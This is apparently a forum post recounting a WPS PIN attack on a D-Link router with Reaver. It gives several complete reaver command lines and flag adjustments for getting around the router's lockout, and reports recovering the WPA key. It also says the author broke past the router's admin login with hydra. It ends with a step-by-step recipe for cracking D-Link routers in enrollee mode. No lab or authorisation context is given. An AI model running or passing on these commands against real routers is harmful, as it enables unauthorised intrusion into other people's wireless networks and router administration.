First attempts at cracking this D-Link Router with Reaver seemed to be blocked by the firmware. Note the RSSI was 67 so signal strength was not an issue. We tried:
reaver -i mon0 -a -f -c 13 -b 6C:19:8F:XX:XX:XX -vv --mac=00:11:22:33:44:55
The router would provide two (2) or three (3) pins and then freeze for a long period.
Next we employed the command line:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -S -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
Pin harvesting was good but the router ran up to 99:99% and spun at that number requesting pins endlessly. We started a new session and ran it up to 99:99% twice more with the same results.
After a rethink we focused on the -S dh-small. We removed the -S -a and -f from the command line and ran:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
Removing the -a forced reaver to ask if we wanted to restore the previous session. We selected n, i.e. NO.
We got the key in one (1) pass BUT the WPS key was 12345670 according to reaver. This intrigued us so we logged onto the router using the WPA key provided by reaver, got association, then hacked past the router's login page with hydra and went straight to the WPS page:
1. The WPS system was active
2. The WPS mode was Enrollee
3. No WPS pin was seen
This may mean that:
1. D-Link routers in the enrollee mode might be hacked by running through the pins to 99:99% using the dh-small, then removing the -S and -a, which will force reaver to ask if you want to restore the old session. Say no and run the attack again.
OR
2. Just running the command line:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
against this router if in enrollee mode will crack the code in one iteration.
MTC